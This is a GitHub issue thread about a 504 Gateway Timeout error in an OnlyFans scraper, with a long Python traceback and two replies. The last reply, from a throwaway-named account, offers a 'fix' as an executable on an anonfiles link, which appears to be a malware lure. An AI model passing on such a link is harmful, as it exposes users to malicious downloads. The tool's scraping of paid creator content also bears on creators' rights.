### ISSUE TITLE
504 Gateway Timeout

### ISSUE THREAD

**Issue by SuicidalFrisson** [DIGITALCRIMINAL/UltimaScraper#1888]
Below is what I get shortly after it starts scanning. Mind you it works sometimes, then randomly drops this error.
`File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\lib\site-packages\onlyfans_scraper\scraper.py", line 181, in get_models
    list_subscriptions = asyncio.run(  File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\lib\asyncio\runners.py", line 44, in run
    return loop.run_until_complete(main)
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\lib\asyncio\base_events.py", line 647, in run_until_complete
    return future.result()
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\lib\site-packages\onlyfans_scraper\api\subscriptions.py", line 22, in get_subscriptions
    subscriptions = await asyncio.gather(*tasks)
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\lib\site-packages\onlyfans_scraper\api\subscriptions.py", line 37, in scrape_subscriptions
    r.raise_for_status()
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\lib\site-packages\httpx\_models.py", line 736, in raise_for_status
    raise HTTPStatusError(message, request=request, response=self)
httpx.HTTPStatusError: Server error '504 Gateway Timeout' for url 'https://onlyfans.com/api2/v2/subscriptions/subscribes?offset=60&type=active&sort=asc&field=expire_date&limit=10'
For more information check: https://httpstatuses.com/504
Traceback (most recent call last):
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\lib\runpy.py", line 197, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\lib\runpy.py", line 87, in _run_code
    exec(code, run_globals)
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\Scripts\onlyfans-scraper.exe\__main__.py", line 7, in <module>
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\lib\site-packages\onlyfans_scraper\scraper.py", line 328, in main
    process_prompts()
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\lib\site-packages\onlyfans_scraper\scraper.py", line 229, in process_prompts
    parsed_subscriptions = get_models(headers, subscribe_count)
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\lib\site-packages\onlyfans_scraper\scraper.py", line 181, in get_models
    list_subscriptions = asyncio.run(  File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\lib\asyncio\runners.py", line 44, in run
    return loop.run_until_complete(main)
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\lib\asyncio\base_events.py", line 647, in run_until_complete
    return future.result()
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\lib\site-packages\onlyfans_scraper\api\subscriptions.py", line 22, in get_subscriptions
    subscriptions = await asyncio.gather(*tasks)
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\lib\site-packages\onlyfans_scraper\api\subscriptions.py", line 37, in scrape_subscriptions
    r.raise_for_status()
  File "C:\Users\Admin\AppData\Local\Programs\Python\Python39\lib\site-packages\httpx\_models.py", line 736, in raise_for_status
    raise HTTPStatusError(message, request=request, response=self)
httpx.HTTPStatusError: Server error '504 Gateway Timeout' for url 'https://onlyfans.com/api2/v2/subscriptions/subscribes?offset=60&type=active&sort=asc&field=expire_date&limit=10'
For more information check: https://httpstatuses.com/504`

**Comment by LunarPenguin** [comment]
This version of the program is dead. please go [here](https://github.com/DIGITALCRIMINALS/OnlyFans)

**Comment by ewhgae457yaefgae4** [comment]
Created a fix for it.
anonfiles com/d379Fe06y3/onlyfansdownloader_exe
